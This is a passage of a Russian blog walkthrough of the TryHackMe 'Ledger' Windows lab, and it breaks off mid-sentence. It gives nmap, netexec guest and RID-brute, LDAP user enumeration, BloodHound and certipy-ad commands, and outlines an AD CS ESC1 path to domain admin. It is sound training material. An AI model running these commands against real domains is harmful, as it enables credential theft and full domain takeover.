{"id":478841,"date":"2026-05-06T19:32:07","date_gmt":"2026-05-06T19:32:07","guid":{"rendered":"https:\/\/savepearlharbor.com\/?p=478841"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=478841","title":{"rendered":"Ledger \u2014 \u043f\u0440\u043e\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u0435 \u0441\u043b\u043e\u0436\u043d\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u044b \u043e\u0442 Tryhackme"},"content":{"rendered":"<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e51\/5a7\/726\/e515a77260830c36e422e9d22f1aa3c8.png\" alt=\"Ledger\" sizes=\"(max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/e51\/5a7\/726\/e515a77260830c36e422e9d22f1aa3c8.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e51\/5a7\/726\/e515a77260830c36e422e9d22f1aa3c8.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>Ledger<\/figcaption><\/div>\n<\/figure>\n<p> Ledger \u2014 \u044d\u0442\u043e \u0441\u043b\u043e\u0436\u043d\u0430\u044f \u043c\u0430\u0448\u0438\u043d\u0430 Windows \u043d\u0430 TryHackMe, \u0432 \u0446\u0435\u043d\u0442\u0440\u0435 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u0430\u044f \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f \u0441\u043b\u0443\u0436\u0431 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0432 Active Directory (AD CS). \u041f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u0430\u044f \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0430 \u0432\u044b\u044f\u0432\u043b\u044f\u0435\u0442 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430 (<code>labyrinth.thm.local<\/code>) \u0441 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u043e\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439 SMB null \u0438 LDAP, \u0440\u0430\u0441\u043a\u0440\u044b\u0432\u0430\u044e\u0449\u0438\u043c \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u043f\u0440\u0438\u043c\u0435\u0447\u0430\u043d\u0438\u044f\u0445. \u0427\u0435\u0440\u0435\u0437 <code>certipy-ad<\/code> \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0448\u0430\u0431\u043b\u043e\u043d \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430 <code>ServerAuth<\/code> , \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0443\u044f\u0437\u0432\u0438\u043c \u043a <strong>ESC1<\/strong>, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043b\u044e\u0431\u043e\u043c\u0443 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0437\u0430\u043f\u0440\u043e\u0441\u0438\u0442\u044c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442, \u0432\u044b\u0434\u0430\u0432\u0430\u044f \u0441\u0435\u0431\u044f \u0437\u0430 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430. \u0425\u044d\u0448 NT \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u0435\u0442\u0441\u044f \u0438\u0437 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430, \u0430 <code>psexec<\/code> \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u0443\u044e \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0443 NT AUTHORITY SYSTEM. \u0410\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u043d\u044b\u0439 \u043f\u0443\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0447\u0435\u0440\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e LDAP Schannel \u0434\u043b\u044f \u0441\u043b\u0443\u0447\u0430\u0435\u0432, \u043a\u043e\u0433\u0434\u0430 Kerberos PKINIT \u043d\u0435 \u0441\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442. <\/p>\n<h3>\u0420\u0430\u0437\u0432\u0435\u0434\u043a\u0430 (T1595.002)<\/h3>\n<p>\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0432 \u0437\u0430\u0434\u0430\u043d\u0438\u0438 \u0443 \u043d\u0430\u0441 \u0441\u043a\u0430\u0437\u0430\u043d\u043e, \u0447\u0442\u043e \u043d\u0443\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0438\u0442\u044c Active Directory, \u0437\u043d\u0430\u0447\u0438\u0442 \u0443 \u043d\u0430\u0441 Windows, \u0430 \u0434\u043b\u044f \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0433\u043e \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u044d\u0442\u043e\u0439 \u041e\u0421, \u043d\u0443\u0436\u043d\u043e \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0444\u043b\u0430\u0433 -Pn.<\/p>\n<pre><code class=\"bash\">sudo nmap -sC -sV -v 10.114.161.221 -Pn<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:87px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0417\u0434\u0435\u0441\u044c \u043c\u043d\u043e\u0433\u043e \u043f\u043e\u0440\u0442\u043e\u0432, \u0435\u0441\u043b\u0438 \u0441\u0440\u0430\u0432\u043d\u0438\u0432\u0430\u0442\u044c \u0441 \u043c\u0430\u0448\u0438\u043d\u0430\u043c\u0438 \u043d\u0430 Linux.<\/p>\n<pre><code class=\"bash\">PORT     STATE SERVICE       VERSION53\/tcp   open  domain        Simple DNS Plus80\/tcp   open  http          Microsoft IIS httpd 10.088\/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-05-03 09:42:50Z)135\/tcp  open  msrpc         Microsoft Windows RPC139\/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn389\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.local, Site: Default-First-Site-Name)|_ssl-date: 2026-05-03T09:44:40+00:00; 0s from scanner time.| ssl-cert: Subject: commonName=labyrinth.thm.local| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:labyrinth.thm.local| Issuer: commonName=thm-LABYRINTH-CA443\/tcp  open  ssl\/https?445\/tcp  open  microsoft-ds?464\/tcp  open  kpasswd5?593\/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0636\/tcp  open  ssl\/ldap      Microsoft Windows Active Directory LDAP (Domain: thm.local, Site: Default-First-Site-Name)|_ssl-date: 2026-05-03T09:44:39+00:00; -1s from scanner time.| ssl-cert: Subject: commonName=labyrinth.thm.local| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:labyrinth.thm.local3268\/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.local, Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=labyrinth.thm.local| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:labyrinth.thm.local3269\/tcp open  ssl\/ldap      Microsoft Windows Active Directory LDAP (Domain: thm.local, Site: Default-First-Site-Name)3389\/tcp open  ms-wbt-server Microsoft Terminal Services<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u041f\u0435\u0440\u0432\u043e\u0435, \u043d\u0430 \u0447\u0442\u043e \u0441\u0442\u043e\u0438\u0442 \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u044c \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u044d\u0442\u043e \u0434\u043e\u043c\u0435\u043d\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0443\u0436\u043d\u043e \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0432 \/etc\/hosts.<\/p>\n<p>\u0415\u0441\u0442\u044c \u0434\u0430\u0436\u0435 \u0432\u0435\u0431\u0447\u0438\u043a \u043d\u0430 80 \u0438 443 \u043f\u043e\u0440\u0442\u0443, \u043d\u043e \u0442\u0430\u043c \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u0430\u044f \u0437\u0430\u0433\u043b\u0443\u0448\u043a\u0430 \u043e\u0442 IIS, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0442\u0430\u043c \u0434\u0435\u043b\u0430\u0442\u044c \u043d\u0435\u0447\u0435\u0433\u043e. \u0424\u0430\u0437\u0437\u0438\u0442\u044c, \u0442\u0430\u043c \u0447\u0442\u043e-\u043b\u0438\u0431\u043e \u0431\u0435\u0441\u043f\u043e\u043b\u0435\u0437\u043d\u043e.<\/p>\n<p>4 \u043f\u043e\u0440\u0442\u0430 389,636,3268,3269 ldap. \u041e\u043d\u0438 \u0440\u0430\u0437\u0434\u0435\u043b\u044f\u044e\u0442\u0441\u044f \u043f\u043e \u0441\u043f\u043e\u0441\u043e\u0431\u0443 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u043e\u0431\u044a\u0435\u043c\u0443 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445.<\/p>\n<p>\u041e\u0447\u0435\u043d\u044c \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439 \u043f\u043e\u0440\u0442 3389 \u044d\u0442\u043e rdp, \u043e\u0434\u043d\u0430\u043a\u043e \u043f\u043e\u043a\u0430 \u0443 \u043d\u0430\u0441 \u043d\u0435\u0442 \u043a\u0440\u0435\u0434\u043e\u0432, \u0447\u0442\u043e\u0431\u044b \u0442\u0443\u0434\u0430 \u0437\u0430\u0439\u0442\u0438.<\/p>\n<p>445 \u043f\u043e\u0440\u0442 \u043f\u043e\u043c\u0435\u0447\u0435\u043d \u043a\u0430\u043a microsoft-ds?, \u043d\u043e \u044d\u0442\u043e \u0434\u043e\u043b\u0436\u0435\u043d \u0431\u044b\u0442\u044c smb.<\/p>\n<hr\/>\n<h3>\u0420\u0430\u0437\u0432\u0435\u0434\u043a\u0430 \u0447\u0435\u0440\u0435\u0437 smb<\/h3>\n<p>\u041f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0443\u0437\u043d\u0430\u0442\u044c \u0434\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043e\u0431\u0449\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0445\u043e\u0441\u0442\u0435. \u0411\u0443\u0434\u0443 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u0442\u0438\u043b\u0438\u0442\u0443 netexec.<\/p>\n<pre><code class=\"bash\">~  nxc smb 10.114.161.221                                      SMB         10.114.161.221  445    LABYRINTH        [*] Windows 10 \/ Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:None) (Null Auth:True)<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0417\u0434\u0435\u0441\u044c \u0432\u0430\u0436\u043d\u044b\u0439 \u0432\u044b\u0432\u043e\u0434 \u044d\u0442\u043e Null Auth:true. \u042d\u0442\u043e \u043e\u0437\u043d\u0430\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0430 \u00ab\u043d\u0443\u043b\u0435\u0432\u0430\u044f \u0441\u0435\u0441\u0441\u0438\u044f\u00bb (\u0432\u0445\u043e\u0434 \u0431\u0435\u0437 \u043b\u043e\u0433\u0438\u043d\u0430 \u0438 \u043f\u0430\u0440\u043e\u043b\u044f).<\/p>\n<p>\u0421 \u043f\u0443\u0441\u0442\u044b\u043c\u0438 \u043a\u0440\u0435\u0434\u0430\u043c\u0438 \u043d\u0430\u0441 \u043d\u0435 \u043f\u0443\u0441\u043a\u0430\u0435\u0442, \u0437\u0430\u0442\u043e \u0433\u043e\u0441\u0442\u044f \u043f\u0440\u0438\u043d\u044f\u043b\u0438 \u043a\u0430\u043a \u0440\u043e\u0434\u043d\u043e\u0433\u043e, \u0437\u0430\u043e\u0434\u043d\u043e \u043c\u043e\u0436\u043d\u043e \u0438\u0437\u0443\u0447\u0438\u0442\u044c \u0441\u043f\u0438\u0441\u043e\u043a \u0432\u0441\u0435\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438 \u0433\u0440\u0443\u043f\u043f.<\/p>\n<pre><code class=\"bash\">nxc smb 10.114.161.221  -u 'guest' -p '' --rid-brute<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<h3>\u0420\u0430\u0437\u0432\u0435\u0434\u043a\u0430 \u0447\u0435\u0440\u0435\u0437 ldap<\/h3>\n<p>\u0421\u0442\u043e\u0438\u0442 \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u044d\u0442\u043e\u0439 \u0436\u0435 \u0443\u0442\u0438\u043b\u0438\u0442\u043e\u0439 \u0441\u043f\u0438\u0441\u043e\u043a \u044e\u0437\u0435\u0440\u043e\u0432 \u0447\u0435\u0440\u0435\u0437 \u043f\u043e\u0440\u0442 389. \u0417\u0434\u0435\u0441\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435.<\/p>\n<pre><code class=\"bash\">nxc ldap 10.114.161.221 -u 'guest' -p '' --users<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0417\u0434\u0435\u0441\u044c \u0442\u0430\u043a\u0436\u0435 \u0432\u0438\u0434\u0438\u043c \u043c\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043d\u043e \u0435\u0441\u043b\u0438 \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c, \u0442\u043e \u0443 \u0434\u0432\u043e\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u044c \u0432 \u043f\u0440\u0438\u043c\u0435\u0447\u0430\u043d\u0438\u044f\u0445. IVY_WILLIS \u0438 SUSANNA_MCKNIGHT.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/594\/5f2\/3db\/5945f23dbfdee9105d62f4c1fd0debf1.png\" alt=\"\u041f\u0430\u0440\u043e\u043b\u0438 \u0432 \u043f\u0440\u0438\u043c\u0435\u0447\u0430\u043d\u0438\u044f\u0445\" sizes=\"(max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/594\/5f2\/3db\/5945f23dbfdee9105d62f4c1fd0debf1.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/594\/5f2\/3db\/5945f23dbfdee9105d62f4c1fd0debf1.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u041f\u0430\u0440\u043e\u043b\u0438 \u0432 \u043f\u0440\u0438\u043c\u0435\u0447\u0430\u043d\u0438\u044f\u0445<\/figcaption><\/div>\n<\/figure>\n<p>\u041a\u0440\u0435\u0434\u044b \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u044b, \u043c\u043e\u0436\u043d\u043e \u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u044c\u0441\u044f \u043f\u043e RDP.<\/p>\n<hr\/>\n<h3>\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f (T1190) \u0438 \u043f\u0435\u0440\u0432\u044b\u0439 \u0444\u043b\u0430\u0433<\/h3>\n<p>\u0414\u043b\u044f \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043f\u043e RDP \u044f \u0431\u0443\u0434\u0443 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u0442\u0438\u043b\u0438\u0442\u0443 Remmina.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/aa6\/60f\/d95\/aa660fd9539e578d427a31f20d680538.png\" alt=\"\u041b\u043e\u0433\u0438\u043d\u0438\u043c\u0441\u044f \u043f\u043e RDP\" sizes=\"(max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/aa6\/60f\/d95\/aa660fd9539e578d427a31f20d680538.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/aa6\/60f\/d95\/aa660fd9539e578d427a31f20d680538.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u041b\u043e\u0433\u0438\u043d\u0438\u043c\u0441\u044f \u043f\u043e RDP<\/figcaption><\/div>\n<\/figure>\n<p>\u0412\u0445\u043e\u0434\u0438\u043c \u043f\u043e \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u043e\u043c\u0443 \u0438\u043c\u0435\u043d\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u043f\u0430\u0440\u043e\u043b\u044e, \u0434\u043e\u043c\u0435\u043d &#8212; \u0438\u0437 \u0441\u043a\u0430\u043d\u0430 nmap.<\/p>\n<p>IVY_WILLIS \u043d\u0435 \u043f\u043e\u0434\u0434\u0430\u043b\u0441\u044f \u0438 \u0432\u0438\u0434\u0438\u043c\u043e \u0441\u043c\u0435\u043d\u0438\u043b \u043f\u0430\u0440\u043e\u043b\u044c. \u0417\u0430\u0442\u043e \u043c\u044b \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0437\u0430\u043b\u043e\u0433\u0438\u043d\u0438\u043b\u0438\u0441\u044c \u043f\u043e\u0434 \u0438\u043c\u0435\u043d\u0435\u043c SUSANNA_MCKNIGHT \u0438 \u0444\u043b\u0430\u0433 \u043d\u0430 \u0440\u0430\u0431\u043e\u0447\u0435\u043c \u0441\u0442\u043e\u043b\u0435.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/90e\/609\/b52\/90e609b52fc01f49ea8f3d6d16fe7cf1.png\" alt=\"\u041f\u0435\u0440\u0432\u044b\u0439 \u0444\u043b\u0430\u0433\" sizes=\"(max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/90e\/609\/b52\/90e609b52fc01f49ea8f3d6d16fe7cf1.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/90e\/609\/b52\/90e609b52fc01f49ea8f3d6d16fe7cf1.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u041f\u0435\u0440\u0432\u044b\u0439 \u0444\u043b\u0430\u0433<\/figcaption><\/div>\n<\/figure>\n<pre><code>THM{Firslt_user_flag!}<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<h3>\u041f\u043e\u0438\u0441\u043a \u0432\u0435\u043a\u0442\u043e\u0440\u0430 \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0435\u043b\u0435\u0433\u0438\u0439 \u0432 AD<\/h3>\n<p>\u041d\u0443\u0436\u043d\u043e \u0431\u044b \u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c\u0441\u044f \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0431\u0443\u0434\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c Bloodhound \u0434\u043b\u044f \u0432\u0438\u0437\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043d\u0430\u0448\u0435\u0433\u043e \u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u044f.<\/p>\n<pre><code class=\"bash\">bloodhound-ce-python -d thm.local -ns 10.114.161.221 -dc labyrinth.thm.local --zip -c all -u 'SUSANNA_MCKNIGHT' -p '******'<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u042d\u0442\u0430 \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0441\u043e\u0437\u0434\u0430\u0441\u0442 zip \u0430\u0440\u0445\u0438\u0432. \u0417\u0430\u0442\u0435\u043c \u043f\u0440\u043e\u0441\u0442\u043e \u044d\u043a\u0441\u043f\u043e\u0440\u0442\u0438\u0440\u0443\u0435\u043c \u0435\u0433\u043e \u0432 bloodhound \u0434\u043b\u044f \u043d\u0430\u0433\u043b\u044f\u0434\u043d\u043e\u0441\u0442\u0438.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/48b\/7b7\/b1d\/48b7b7b1dbe74aa148a5969e8e458286.png\" alt=\"Bloodhound \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0430\" sizes=\"(max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/48b\/7b7\/b1d\/48b7b7b1dbe74aa148a5969e8e458286.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/48b\/7b7\/b1d\/48b7b7b1dbe74aa148a5969e8e458286.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>Bloodhound \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0430<\/figcaption><\/div>\n<\/figure>\n<p>\u0417\u0434\u0435\u0441\u044c \u043c\u043e\u0436\u0435\u043c \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0442\u044c \u043f\u0443\u0442\u044c \u043e\u0442 \u043d\u0430\u0448\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0434\u043e \u0433\u0440\u0443\u043f\u043f\u044b Domain Admins. \u0426\u0435\u043b\u044c \u2014 Beverly \u0438\u043b\u0438 Bradley: \u042d\u0442\u0438 \u0434\u0432\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u2014 \u043a\u0440\u0430\u0442\u0447\u0430\u0439\u0448\u0438\u0439 \u043f\u0443\u0442\u044c \u043a \u043f\u043e\u043b\u043d\u043e\u043c\u0443 \u0437\u0430\u0445\u0432\u0430\u0442\u0443 \u0434\u043e\u043c\u0435\u043d\u0430. \u041e\u0434\u043d\u0430\u043a\u043e \u044d\u0442\u043e\u0442 \u043f\u0443\u0442\u044c \u043d\u0435 \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0439 \u043a \u043f\u043e\u043b\u043d\u043e\u043c\u0443 \u0437\u0430\u0445\u0432\u0430\u0442\u0443.<\/p>\n<p>\u041f\u0440\u0438 \u0440\u0430\u0431\u043e\u0442\u0435 \u0441 Active Direcory, \u043f\u043e\u043b\u0435\u0437\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u043e\u0448\u0438\u0431\u043a\u0438 \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f\u0445 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0432. \u0414\u043b\u044f \u044d\u0442\u0438\u0445 \u0446\u0435\u043b\u0435\u0439 \u043f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0443\u0442\u0438\u043b\u0438\u0442\u043e\u0439 certipy-ad.<\/p>\n<pre><code class=\"bash\">certipy-ad find -u SUSANNA_MCKNIGHT -p '******' -dc-ip 10.114.161.221 -vulnerable<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/198\/0e1\/1cc\/1980e11cc9e5bb70b28a504c4db96905.png\" alt=\"\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c ESC1\" sizes=\"(max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/198\/0e1\/1cc\/1980e11cc9e5bb70b28a504c4db96905.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/198\/0e1\/1cc\/1980e11cc9e5bb70b28a504c4db96905.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c ESC1<\/figcaption><\/div>\n<\/figure>\n<p>\u0423\u0441\u043f\u0435\u0445, \u0435\u0441\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0442\u044c ESC1.<\/p>\n<p>\u0428\u0430\u0431\u043b\u043e\u043d ServerAuth \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043b\u044e\u0431\u043e\u043c\u0443 \u0447\u043b\u0435\u043d\u0443 Authenticated Users \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 \u043a\u043b\u0438\u0435\u043d\u0442\u0441\u043a\u043e\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043d\u0430 \u0438\u043c\u044f 